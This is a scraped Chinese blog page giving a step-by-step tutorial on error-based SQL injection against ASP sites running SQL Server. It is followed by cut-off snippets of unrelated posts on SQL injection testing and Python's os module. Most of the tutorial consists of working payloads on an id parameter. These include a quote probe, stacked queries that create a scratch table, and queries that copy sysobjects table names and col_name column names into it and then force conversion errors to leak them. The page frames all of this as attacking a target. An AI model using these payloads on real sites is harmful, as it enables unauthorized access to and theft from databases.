SQL指令碼注入的不常見方法概括

2021-06-05 21:08:22 字數 1502 閱讀 4102

我來說說他們的文章系統原理:全部文章均在資料庫存有乙個副本。另處根據模板生成乙個html頁面。

我們就可以這樣來試一下可否注入: http://伺服器網域名稱/count.asp?id=1552』

看一下是否出錯。如出錯說明有注入漏洞。然後正常攻擊。

在本機建立一下post.htm的檔案和log.txt的文字檔案(用來記錄用,這是乙個好習慣)

post.htm內容:主要是方便輸入。

對於sqlserver的伺服器可以這樣判斷:在1552後加一分號,如正常有可能是sqlserver

對於這類資料庫可以先建乙個表id=1552;create table aaa(aaa char(20));--

然後插入一條記錄:id=1552;insert into aaa values(』test』);--

再之後列舉出他的資料表名:

id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=』u』 and status>0);--

這是將第乙個表名更新到aaa的字段處。

id=1552 and exists(select * from aaa where aaa>5)就會報錯,多數情況會將表名直接讀出:

microsoft ole db provider for sql server 錯誤 』80040e07』

將 varchar 值 』vote』 轉換為資料型別為 int 的列時發生語法錯誤。

/search.asp,行21

其中vote就是表名:

也可以先猜出乙個表名,再把(select top 1 name from sysobjects where xtype=』u』 and status>0)的值更新到那個表的一條記錄中去。通過網頁顯示。

讀出第乙個表,第二個表可以這樣讀出來(在條件後加上 and name<>』剛才得到的表名』)。

id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=』u』 and status>0 and name<>』vote』);--

然後id=1552 and exists(select * from aaa where aaa>5)

讀出第二個表,^^^^^^乙個個的讀出,直到沒有為止。

讀字段是這樣:

id=1552;update aaa set aaa=(select top 1 col_name(object_id(』表名』),1));--

然後id=1552 and exists(select * from aaa where aaa>5)出錯,得到欄位名

id=1552;update aaa set aaa=(select top 1 col_name(object_id(』表名』),2));--

然後id=1552 and exists(select * from aaa where aaa>5)出錯,得到欄位名

……類推

SQL指令碼注入的不常見方法概括

大家在是否碰到過這樣的站點,全站文章系統採用fso靜態生成的html檔案來顯示。這樣做的好處一來可以減輕伺服器負擔,提高訪問速度。二來也阻止了sql注入式的攻擊。我來說說他們的文章系統原理 全部文章均在資料庫存有乙個副本。另處根據模板生成乙個html頁面。我們就可以這樣來試一下可否注入 http 伺...

SQL注入的常見方式及測試方法

本文主要針對sql注入的含義 以及如何進行sql注入和如何預防sql注入讓小夥伴有個了解。適用的人群主要是測試人員,了解如何進行sql注入,可以幫助我們測試登入 發布等模組的sql攻擊漏洞,至於如何預防sql注入,按理說應該是開發該了解的事情 但是作為乙個棒棒的測試,搞清楚原理是不是能讓我們更加透徹...

Python os的常見方法

1 os.getcwd filename 相當於在當前執行檔案的目錄下建立乙個以filename命名的檔案 2 os.path.realpath file 獲取當前檔案路徑 c users admin pycharmprojects test case test unitest.py file 表示...